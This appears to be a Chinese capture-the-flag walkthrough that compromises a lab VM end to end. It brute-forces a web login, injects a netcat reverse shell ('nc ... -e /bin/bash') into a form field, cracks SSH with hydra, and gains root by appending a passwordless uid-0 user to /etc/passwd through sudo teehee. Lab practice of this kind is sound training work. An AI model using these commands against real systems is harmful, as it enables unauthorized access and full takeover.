一、扫描获取靶机ip
arp-scan -l
192.168.203.143
二、获取网站信息
访问网站
1.nmap
nmap -sV -A 192.168.203.143
开放了80、22端口
看见22端口开放了ssh
2.Wappaloyzer
Web服务器:Nginx 1.15.10
3.BurpSuit
登录,用户名admin,密码随意
用burpsuit拦截
爆破密码
密码:happy
成功登陆
上传命令,继续拦截
先改成ls
也可以使用其他命令
我们尝试反弹shell
kali监听
nc -vnlp 3939
BurpSuit发送命令
radio=nc 192.168.203.141 3939 -e /bin/bash&submit=Run
成功连接
使用python反弹一个交互式shell
python -c 'import pty;pty.spawn("/bin/sh")'
切换到根目录
cd /
cd home 切换到home文件夹
ls 发现三个账户,一次cd 发现jim中有文件
cd jim 切换到jim
ls 发现文件
cat backups切换到backups
ls 发现备份密码文件old-passwords.bak
将密码备份到本地,我将其命名为1.txt
返回到/home/jim
查看test.sh
cat test.sh
4.hydra
考虑用hydra进行对jim的密码进行爆破,密码本为1.txt
创建账号名文件2.txt,写入三个用户名
vim 2.txt charkes jim san
使用hydra爆破密码
hydra -L 2.txt -P 1.txt ssh://192.168.203.143
爆破出账号:jim 密码:jibril04
5.ssh
ssh连接
ssh jim@192.168.203.143
查看现有文件,查看mbox
ls
cat mbox
在ssh成功连接后有一句提示:我们收到了一封邮件
我们找一下email
find / -name "*mail*"
最后终于发下mail文件在 /var/mail 中
cat /var/mail
cat jim
得密码
Charles去度假了,因此老板要求他把他的密码给jim防止出现什么问题
^xHhA&hvim0y
所以我们可以登录Charles的账号
sudo -l
发现我们利用teeheee提权进行root操作
teehee提权是使用teehee -a 把一个账号密码写入到etc/passwd中,这个用户具有root权限,再切换到这个用户即可
- 尝试在/etc/passwd文件下追加内容,该文件的结构:
用户名:是否有密码保护(x即有保护):uid:gid:全称:home目录:/bin/bash
echo "ciyaso::0:0:::/bin/bash" | sudo teehee -a /etc/passwd //提权语句
su ciyaso
cat /root/flag.txt